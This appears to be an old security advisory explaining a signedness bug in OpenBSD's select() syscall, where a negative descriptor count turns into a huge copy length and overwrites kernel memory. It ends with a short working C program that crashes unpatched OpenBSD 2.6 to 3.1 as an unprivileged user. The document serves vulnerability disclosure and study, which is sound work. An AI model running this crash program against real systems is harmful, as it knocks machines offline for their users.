openbsd-select-bug.txt

`Hi there,  
  
Recently a bug in the select() syscall of openbsd was published.  
This text describes the details and the eventual exploitation of this bug.  
  
First of all let us look at the definition of select():  
  
int select(int nfds, fd_set *readfds, fd_set *writefds,   
fd_set *exceptfds, struct timeval *timeout);  
  
The first argument is the number of the file descriptors, followed by  
the three sets of descriptors (read,write,except) plus a timeout before  
returning, which is optional (NULL equals no timeout).  
  
The implementation of sys_select() takes place in kern/sys_generic.c.  
Let's go through the code, step by step:  
  
..  
register struct sys_select_args /* {  
syscallarg(int) nd;  
syscallarg(fd_set *) in;  
syscallarg(fd_set *) ou;  
syscallarg(fd_set *) ex;  
syscallarg(struct timeval *) tv;  
} */ *uap = v;  
fd_set bits[6], *pibits[3], *pobits[3];  
..  
int s, ncoll, error = 0, timo;  
u_int ni;  
..  
(1) if (SCARG(uap, nd) > p->p_fd->fd_nfiles) {  
/* forgiving; slightly wrong */  
SCARG(uap, nd) = p->p_fd->fd_nfiles;  
}  
(2) ni = howmany(SCARG(uap, nd), NFDBITS) * sizeof(fd_mask);  
..  
(3) #define getbits(name, x) \  
if (SCARG(uap, name) && (error = copyin((caddr_t)SCARG(uap, name), \  
(caddr_t)pibits[x], ni))) \  
goto done;  
(4) getbits(in, 0);  
getbits(ou, 1);  
getbits(ex, 2);  
#undef getbits  
..  
  
SCARG is a macro to access arg2 from structure arg1. At (1) an upperbound check  
is done to adjust 'nd' (arg1 of select) in case it is bigger than the number of  
open files that are allocated. There we spot the first problem. Both values  
of the comparison are signed integers and it only checks for an upperbound limit.   
What happens if you enter a negative value ? We will see.  
  
At (2) it stores in 'ni' (which is defined as u_int) how many bytes are   
needed to copy from the descriptor sets to the local pibits fd_set. If we assume   
that 'nd' is a negative value then something special happens. Let's zoom in:  
(from sys/types.h)  
  
#define NBBY 8  
typedef int32_t fd_mask;  
#define NFDBITS (sizeof(fd_mask) * NBBY)  
#define howmany(x, y) (((x) + ((y) - 1)) / (y))  
  
On an i386 machine int32_t is 4 bytes, thus NFDBITS equals 32.   
If x is smaller than -31 howmany results in a negative value, thus 'ni' swaps to   
a very big unsigned number. e.g. 536870908.   
This behaviour has a catastrophic impact then the macro (3) getbits does a (4) copyin  
(which is infact something like bcopy) from in,ou,ex to pibits[] with the length  
of ni!   
What does that mean? You can overwrite kernel memory by providing a negative nd and   
with pointers to arbitrary data as arg2,3,4 of the select syscall, since the length  
'ni' is pretty messed up.  
Like that it's very trivial to crash the system as unpriviledged user. It might even   
be possible to compromise the system with specially crafted pointers...  
  
What follows is a very small program which immediately crashes any unpatched OpenBSD   
system (tested 2.6-3.1) as unpriviledged user:  
  
cat > obsdfault.c << EOF  
#include <sys/types.h>  
#include <sys/time.h>  
#include <unistd.h>  
  
int main() {  
int r;  
char *la = "VBASAAAAAAAAAAAAAAA";  
  
r = select(-19999, la, NULL, NULL, NULL);  
exit(0);  
}  
EOF  
  
ugh. yes, it's that easy. Now, select is a very vital syscall and it is/was buggy.  
Imagine, there are 182 other syscalls .... ;-).  
  
Have fun,  
your drugphish.ch security team  
[email protected]  
  
`